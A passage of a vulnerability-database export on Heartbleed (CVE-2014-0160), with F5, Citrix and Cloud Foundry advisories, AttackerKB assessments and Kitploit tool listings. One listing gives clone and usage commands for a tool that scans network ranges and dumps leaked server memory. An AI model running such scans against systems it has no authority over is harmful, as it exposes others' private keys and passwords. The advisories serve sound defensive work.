BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "edition": 1, "modified": "2019-07-30T19:46:00", "published": "2015-02-17T01:30:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:23", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "edition": 1, "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. \n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "modified": "2015-02-16T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "attackerkb": [{"lastseen": "2020-11-18T06:44:13", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at April 13, 2020 8:54pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5**dmelcher5151** at April 15, 2020 4:14pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2014-04-07T00:00:00", "id": "AKB:D165638B-97C5-4C99-BFA0-70576DB52324", "href": "https://attackerkb.com/topics/8avLg1j8ou/cve-2014-0160-aka-heartbleed", "type": "attackerkb", "title": "CVE-2014-0160 (AKA: Heartbleed)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cloudfoundry": [{"lastseen": "2020-03-11T02:54:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected VMware Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * VMware GemFire Native Client 7.0.2.X\n * VMware Command Center 2.0.x, 2.1.x\n * VMware App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the \u2013DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for VMware Command Center.\n * VMware App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "edition": 6, "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2020-02-25T04:38:44", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[ ![](https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png) ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "edition": 20, "modified": "2014-04-10T00:55:31", "published": "2014-04-10T00:55:31", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T04:43:38", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[ ![](https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s640/Heartbleed_Scanner.png) ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s640/Heartbleed%2BScanner.png) ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. \n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "edition": 18, "modified": "2015-10-01T09:47:01", "published": "2015-10-01T09:47:01", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "citrix": [{"lastseen": "2020-11-18T15:29:34", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160", "CVE-2015-0160"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n <a name=\"TopOfPage\"></a>\n Overview\n A vulnerability has been recently disclosed in OpenSSL that could result in remote attackers being able to obtain sensitive data from the process address space of a vulnerable OpenSSL server or client. \n The issue has been assigned the following CVE identifier and is also known as the Heartbleed vulnerability:\n CVE-2014-0160: <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160</a>\n What Citrix is Doing\n Citrix has analyzed the impact of this issue on currently supported products. The following sections of this advisory provide impact information on each product.\n Products That Require Citrix Updates:\n<ul>\n \u2022 HDX RealTime Optimization Pack for Microsoft Lync 2010: This component is vulnerable to CVE-2014-0160. An updated version of this component has been released to address this issue. Citrix recommends customers deploy these patches as soon as possible. These patches can be found on our website at the following locations:\n o Windows - <a href=\"https://support.citrix.com/article/CTX140719\">https://support.citrix.com/article/CTX140719</a>\n o Mac - <a href=\"https://support.citrix.com/article/CTX140730\">https://support.citrix.com/article/CTX140730</a>\n o Linux - <a href=\"https://support.citrix.com/article/CTX140732\">https://support.citrix.com/article/CTX140732</a>\n \u2022 Citrix XenMobile App Controller: XenMobile App Controller versions 2.9 and 2.10 are vulnerable to CVE-2014-0160. Patches have been released to address this issue for both App controller 2.9 and 2.10. Citrix recommends that customers deploy these patches as soon as possible. These patches are available from the following location: <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a>. Further information on this can be found in the following blog post: <a href=\"http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/\">http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/</a> <a name=\"P17_1652\"></a>.\n \u2022 Citrix XenMobile MDX Toolkit & SDK: MDX Toolkit and SDK Versions 2.2.1 (XenMobile 8.6.1) and 2.3.61 (XenMobile 8.7) use a vulnerable version of OpenSSL when wrapping iOS applications. Enterprise-ready mobile apps on the Worx App Gallery that use this version of Worx SDK also use a vulnerable version of OpenSSL. Outgoing micro VPN network connections to Access Gateway from iOS applications that were wrapped, or Worx SDK enabled, with this version will be encapsulated in a TLS connection that uses a vulnerable version of OpenSSL. Citrix has released a new version of the MDX Toolkit & SDK for iOS and Android Build MDX Toolkit; this can be found on the Citrix website at the following address: <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a>. Wrapped Android applications make use of the underlying Android version of OpenSSL, Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160.\n \u2022 Citrix XenMobile Worx components for iOS: Worx Home for iOS version 8.7 uses a vulnerable version of OpenSSL. A new version of this software, 8.7.1.27, can be downloaded from the Apple App Store at the following address: <a href=\"https://itunes.apple.com/us/app/worx-home/id434682528?mt=8\">https://itunes.apple.com/us/app/worx-home/id434682528?mt=8</a>. Customers that are using wrapped versions of iOS Worx applications are also advised to review the guidance on the MDX Toolkit given above. \n \u2022 Receiver for BlackBerry: The Receiver for BlackBerry 10 version 2.0.0.21 is vulnerable to CVE-2014-0160. A new version of the Receiver for BlackBerry 10, 2.0.0.22, can be downloaded from the BlackBerry World website at the following address: <a href=\"http://appworld.blackberry.com/webstore/content/34621918\">http://appworld.blackberry.com/webstore/content/34621918</a>. Receiver for PlayBook version 1.0.0 and Receiver for BlackBerry version 2.2 are not vulnerable to CVE-2014-0160.\n \u2022 Citrix Licensing: The Citrix License Server for Windows version 11.11.1, the Citrix License Server VPX version 11.12 and the Citrix Usage Collector are vulnerable to CVE-2015-0160. New versions of the License Server for Windows , 11.11.1.13017, and the License Server VPX, 11.12.14001, can be downloaded from the Citrix website at the following address: <a href=\"https://www.citrix.com/downloads/licensing/license-server.html\">https://www.citrix.com/downloads/licensing/license-server.html</a> \n \u2022 Citrix CloudPlatform: The TLS interface exposed by the Secondary Storage VM in Cloud Platform versions 4.2.0, 4.2.1-x and 4.3.0.0 use a version of OpenSSL that is vulnerable to CVE-2014-0160. Citrix has released updated system virtual machine templates to resolve this issue. Citrix recommends that customers update the system virtual machine templates to a patched version and then reboot any Secondary Storage VMs to ensure that the updated OpenSSL version is being used. Instructions on updating the system virtual machine templates can be found in the following Citrix knowledge base article <a href=\"https://support.citrix.com/article/CTX200024\">https://support.citrix.com/article/CTX200024</a>.\n \u2022 Citrix XenClient XT: XenClient XT versions 3.1.4, 3.2.0, and 3.2.1 are vulnerable to CVE-2014-0160. A new version of XenClient XT, 3.2.2, is available on the Citrix website at the following address: <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html</a>. The XenClient XT Synchronizer makes use of the platform provided OpenSSL library. Customers are advised to verify that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.\n \u2022 Citrix XenClient Enterprise: Some versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160. In deployments where the XenClient Synchronizer is only accessed via fully trusted networks, the level of exposure is reduced. The TLS libraries used by currently supported versions of the XenClient Enterprise Synchronizer are not vulnerable to CVE-2014-0160. The following versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160: \n o 4.1.0, 4.1.1, 4.1.2, 4.1.3, and 4.1.4. Citrix has released a new version of the XenClient Enterprise engine, 4.1.5. This can be found at the following address: <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html</a>\n o 4.5.1, 4.5.2, 4.5.3, 4.5.4, and 4.5.5. Citrix has released a new version of the XenClient Enterprise engine, 4.5.6. This can be found at the following address: <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45</a>\n o 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.0.4 and 5.0.5. Citrix has released a new version of the XenClient Enterprise engine, 5.0.6. This can be found at the following address: <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html</a>\n o 5.1.0, and 5.1.1. Citrix has released a new version of XenClient Enterprise, 5.1.2. This can be found at the following address: <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html</a>. \n \u2022 Citrix DesktopPlayer for Mac: DesktopPlayer for Mac version 1.0.x up to and including version 1.0.3 is vulnerable to CVE-2014-0160. A new version of the Desktop Player for Mac, 1.0.4, is available on the Citrix website at the following address: <a href=\"https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html\">https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html</a>. The TLS libraries used by currently supported versions of the DesktopPlayer Synchronizer are not vulnerable to CVE-2014-0160.\n</ul>\n Products That May Require Third Party Updates:\n<ul>\n \u2022 Citrix XenDesktop 7.5: Customers deploying Virtual Desktop Agents that are hosted on Citrix CloudPlatform are advised to verify that the volume worker template is using a version of OpenSSL that is not vulnerable to CVE-2014-0160. Setup instructions for the volume worker template on CloudPlatform can be found in the following document: <a href=\"https://support.citrix.com/article/CTX140428\">https://support.citrix.com/article/CTX140428</a>. Amazon Web Services based deployments use the Linux AMI template. Guidance from Amazon covering VMs based on this template can be found at the following location: <a href=\"https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\">https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/</a>. \n \u2022 Citrix Receiver for Android: Receiver for Android makes use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement by Google on Android can be found here: <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a> <a name=\"P43_8077\"></a>.\n \u2022 Citrix XenMobile Worx components for Android: Worx components running on Android make use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement from Google on Android can be found here: <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a>. \n \u2022 Citrix Receiver for Linux: The TLS libraries included in currently supported versions of Receiver for Linux are not vulnerable to CVE-2014-0160. Version 13.0 of the Receiver for Linux also makes use of the platform provided OpenSSL library. Customers using this version are advised to ensure that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.\n \u2022 Citrix Web Interface: Web Interface makes use of the TLS functionality provided by the 